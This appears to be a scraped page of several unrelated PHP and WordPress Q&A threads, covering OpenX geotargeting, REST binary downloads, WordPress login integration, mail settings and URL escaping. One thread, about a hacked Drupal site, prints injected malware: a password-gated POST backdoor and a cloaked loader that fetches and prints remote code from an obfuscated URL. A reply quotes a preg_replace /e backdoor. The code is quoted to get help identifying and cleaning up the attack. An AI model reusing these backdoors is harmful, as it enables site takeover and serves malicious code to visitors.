I downloaded the latest version of OpenX 2.8.6 and I am trying to setup geotargeting, but it doesn't work. I enabled geoTargeting in administration panel ( Configuration -> Global settings -> Geotargeting module type -> OpenX Max mind (flat file) ). I read in documentation of OpenX that it's not necessary to put any path to the database in plugin settings, so I tried without. I setup delivery options of test banner to be shown only in Serbia. I am refresshing the page that displays banners, but this banner never shows.
I thought that maybe the problem is in old database and that my IP address is not recognised, so I downloaded the latest one database (.dat file) from MaxMind (lite version of Country database) and put the path in settings of the plugin, but it still doesn't work.
Can anyone help me how to resolve this problem?
I had the same problem. It seems that OpenX since version 2.8.x is using its own php-based GeoIP-Database reader (e.g. the "flatfile" option under settings) instead of using a geoip module - which does not seem to work with current GeoIP.dat
To solve this problem I did the following:
1) open plugins/geoTargeting/oxMaxMindGeoIP/oxMaxMindGeoIP.delivery.php
2) search for:
if (isset($GLOBALS['_MAX']['GEO_IP'])) {
$ip = $GLOBALS['_MAX']['GEO_IP'];
OX_Delivery_logMessage('['.$ip.'] : ip from cookie. Plugin_geoTargeting_oxMaxMindGeoIP_oxMaxMindGeoIP_Delivery_getGeoInfo', 7);
} else {
$ip = $_SERVER['REMOTE_ADDR'];
OX_Delivery_logMessage('['.$ip.'] : ip from remote addr. Plugin_geoTargeting_oxMaxMindGeoIP_oxMaxMindGeoIP_Delivery_getGeoInfo', 7);
}
$aGeoConf = (is_array($conf['oxMaxMindGeoIP'])) ? $conf['oxMaxMindGeoIP'] : array();
3) insert below:
$ret = array(
"country_code" => $_SERVER['GEOIP_COUNTRY_CODE']
);
return $ret;
4) save & done
You will find possible return values in the function header:
* #return array An array(
* 'country_code',
* 'region',
* 'city',
* 'postal_code',
* 'latitude',
* 'longitude',
* 'dma_code',
* 'area_code',
* 'organisation',
* 'isp',
* 'netspeed'
* );
*/
Read your module-doc (of mod_geoip) how to get the geo-data from current (or given) IP. In my above example I am using lighttpd 1.5 + mod_geoip (unofficial module). But this fix should also work with apache_note/pecl-geoip/mod_geoip env...
Oh and btw. its of course much faster relying on mod_geoip which caches the db in memory, than doing it all via php on every request (as openx does it).
Related
I am writing a custom endpoint for a REST api in wordpress, following the guide here: https://developer.wordpress.org/rest-api/extending-the-rest-api/adding-custom-endpoints/
I am able to write a endpoint that returns json data. But how can I write an endpoint that returns binary data (pdf, png, and similar)?
My restpoint function returns a WP_REST_Response (or WP_Error in case of error).
But I do not see what I should return if I want to responde with binary data.
Late to the party, but I feel the accepted answer does not really answer the question, and Google found this question when I searched for the same solution, so here is how I eventually solved the same problem (i.e. avoiding to use WP_REST_Response and killing the PHP script before WP tried to send anything else other than my binary data).
function download(WP_REST_Request $request) {
$dir = $request->get_param("dir");
// The following is for security, but my implementation is out
// of scope for this answer. You should either skip this line if
// you trust your client, or implement it the way you need it.
$dir = sanitize_path($dir);
$file = $request->get_param("file");
// See above...
$file = sanitize_path($file);
$sandbox = "/some/path/with/shared/files";
// full path to the file
$path = $sandbox.$dir.$file;
$name = basename($path);
// get the file mime type
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$mime_type = finfo_file($finfo, $path);
// tell the browser what it's about to receive
header("Content-Disposition: attachment; filename=$name;");
header("Content-Type: $mime_type");
header("Content-Description: File Transfer");
header("Content-Transfer-Encoding: binary");
header('Content-Length: ' . filesize($path));
header("Cache-Control: no-cache private");
// stream the file without loading it into RAM completely
$fp = fopen($path, 'rb');
fpassthru($fp);
// kill WP
exit;
}
I would look at something called DOMPDF. In short, it streams any HTML DOM straight to the browser.
We use it to generate live copies of invoices straight from the woo admin, generate brochures based on $wp_query results etc. Anything that can be rendered by a browser can be streamed via DOMPDF.
My hosting provider warned me that my bootstrap.inc file is connecting to an infected host. The issue is meant to be happening between 771 and 808 line of includes/bootstrap.inc file (code below).
This file is somehow changed constantly (once a week), from 120kb to 123kbs. Wherever this happens, I try to upload a clean file. If the file is changed/hacked, my hosting response is longer by 10-15 seconds.
The drupal 7 is updated to 7.41, the modules are up to date.
The code that's causing the issue, is somewhere between those lines (I suspect its the "cookie" part). This is the infected/added part my hosting provider warned me about:
$_passssword = '2505363ea355401256fe974720d85db8';
$p = $_POST;
if (#$p[$_passssword] AND #$p['a'] AND #$p['c']) #$p[$_passssword](#$p['a'], #$p['c'], '');
if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
echo('<!--checker_start ');
$tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css');
echo(substr($tmp, 50));
echo(' checker_end-->');
}
unset($_passssword);
$bad_url = false;
foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
if (preg_match($regex, $_SERVER['REQUEST_URI'])) {
$bad_url = true;
break;
}
}
$cookie_name = 'PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
// setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
// $url = base64_decode('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$url = decrypt_url('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$code = request_url_data($url);
// if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
$echo_done = true;
print $decoded;
}
}//iend
I'm no back-end developer and I've been using bootstrap for hobby related-project for over 8 years.
I tried to clean D7 (reuploaded fresh includes, modules and everything apart from /sites/). Tried to check this on some popular scanners.
Does anyone have any idea, how to block this changes to bootstrap.inc? Are there any successful tools for that, or modules for scanning? Or maybe someone recognizes the exploit and could give me a tip where its coming from?
Thank you in advance.
I had the same hack on my Drupal site. The code they put in the bootstrap.inc file looked almost identical to yours.
Apart of the changes to the bootstrap.inc the hackers installed multiple backdoors in various modules. I was able to find the backdoors using the Hacked module, which allows you to find modified files.
The backdoors in my Drupal looked similar to this code:
<?php #preg_replace('/(.*)/e', #$_POST['ttqdgkkfkolmt'], '');
This code uses a vulnerability in preg_replace, which allows the attackers to execute random PHP code using a simple HTTP post request. (The preg_replace vulnerably is resolved in PHP version > 5.5)
Hope this helped. Good luck finding the backdoors!
I have so far integrated a multisite wordpress that uses 4 main subdomain templates in a single wordpress installation: college.mysite.com | jobs.mysite.com | advisors.mysite.com | answers.mysite.com
A wp user is only required to login once and they inmediately have acccess to any wp template.
However, What I would like to achieve is a bit more complicated than that. I don't want new users and existing members to use wordpress as their main user interface to access private content.
In fact I have disabled registration and hidden wp login altogether.
I would like a more secure and less public signup/login.
For this occassion I would like wordpress to ignore the default login credentials and use instead custom db table names and hashmethod pulled from the same wordpress database.
For instance I have a yii platform called: humhub.
For a user to use wordpress they would need to login through humhub and have wp read the db table names:
user instead of wp_users
a secondary db name would need to be read for the password because humhub uses:
user_password instead of the default value within wp_users (user_pass)
I've tried integrating yii framework with wordpress, I've tried tweaking here and about within the yii framework so that it reads two databases separately but it's far more complicated than simply redirecting the wp login credentials by changing the default login table names within the wordpress files,
please help me,
Let's assume you have some unique identifier so that one user will not accidentally collide with another (in YII/HumHub)
You can load up the WordPress API via
require_once("/path/to/wp-load.php");
//Found normally in the WordPress root directory alongside wp-config.php
You can then when creating a new user in HumHub do:
wp_create_user( $username, $password, $email );
//Where username is the unique identifier
//password is ideally a random hash
//email is their email if relevant
And then log them in (assuming you remembered the username and password!!)
$creds = array();
$creds['user_login'] = $username;
$creds['user_password'] = $password;
$creds['remember'] = true;
$user = wp_signon( $creds, false );
if ( !is_wp_error($user) ) {
ob_start(); //flush buffers - otherwise login won't work or user gets redirected to dashboard
$user_id = $user->ID;
wp_set_current_user( $user_id, null );
wp_set_auth_cookie( $user_id,true );
do_action( 'wp_login', $username );
ob_end_clean();
} else {
//Handle the login error
}
They are then logged into WordPress with cookies etc without any headers interfering with HumHub
Note - the above method may not work is there is a name conflict between WordPress and YII/HumHub. You will get a php error with details of the conflict if that is the case and will have to try something else (such as Oauth plugin)
I am not getting any emails (to the admins) from my Wordpress app on open shift. I installed it using the wordpress example.
I have a contact page form that was working in my other hosting provider.
any ideas?
I had an issue before where emails weren't sending and I added this to my functions.php file:
/**
* change WordPress default FROM email address
**/
add_filter('wp_mail_from', 'new_mail_from');
add_filter('wp_mail_from_name', 'new_mail_from_name');
function new_mail_from($old) {
$email = get_option( 'admin_email' );
return $email;
}
function new_mail_from_name($old) {
$site_name = get_option( 'blogname');
return $site_name;
}
I would erase all of that. I am a very good user in this situation.
#1 every time you change the server, you have to redo the mailer settings.
#2 only and I do mean only use wp-mailer plugin.
#3 set your settings correctly and follow the instructions if you are using wordfence.
#4 for woo, you have to style the mailer in ftp.
I'm trying to load the Google Maps API using the following syntax:
add_action('admin_enqueue_scripts', 'load_google_maps');
...
function load_google_maps()
{
// The actual API key is configured in an options page
$key = get_option('google_maps_api_key');
$gmaps_url = 'http://maps.googleapis.com/maps/api/js?key=' . $key . '&sensor=false';
wp_enqueue_script('google-maps', $gmaps_url, NULL, NULL);
}
WordPress is escaping the "&" to "&". This actually makes the Google server reject the request. When I type it directly into browser address bar with "&sensor=false" at the end, it loads fine.
I saw a bug of this kind mentioned in the WordPress trac system: http://core.trac.wordpress.org/ticket/9243 but it was dismissed as invalid, and the admin responding to the request showed somehow that the "&" approach was fine. It is definitely not fine from Google's point of view.
I could of course just get the function to echo the HTML as a script tag, but I'd rather use the wp_enqueue_script system if possible.
Anyone know of a solution to this?
Cheers,
raff
I've got something similar in our code, and it's working fine (even encoded as &). I suspect your problem is that it's being double-encoded, as you already have &. Trying changing it to:
$gmaps_url = 'http://maps.googleapis.com/maps/api/js?key=' . $key . '&sensor=false';
For what it's worth, our (working) code is:
wp_register_script('googlemaps', 'http://maps.googleapis.com/maps/api/js?' . $locale . '&key=' . GOOGLE_MAPS_V3_API_KEY . '&sensor=false', false, '3');
wp_enqueue_script('googlemaps');
($locale in this case is set to hl=en)
Edit
Looks like the behaviour's changed in the latest version of WordPress - the above doesn't work (but I'll leave it for people on legacy versions). The only alternative I can see to echoing the script is to add a clean_url filter, something like this:
add_filter('clean_url', 'so_handle_038', 99, 3);
function so_handle_038($url, $original_url, $_context) {
if (strstr($url, "googleapis.com") !== false) {
$url = str_replace("&", "&", $url); // or $url = $original_url
}
return $url;
}
Pretty ugly, but perhaps marginally better than echoing the script, as it'll still use the WordPress dependency management.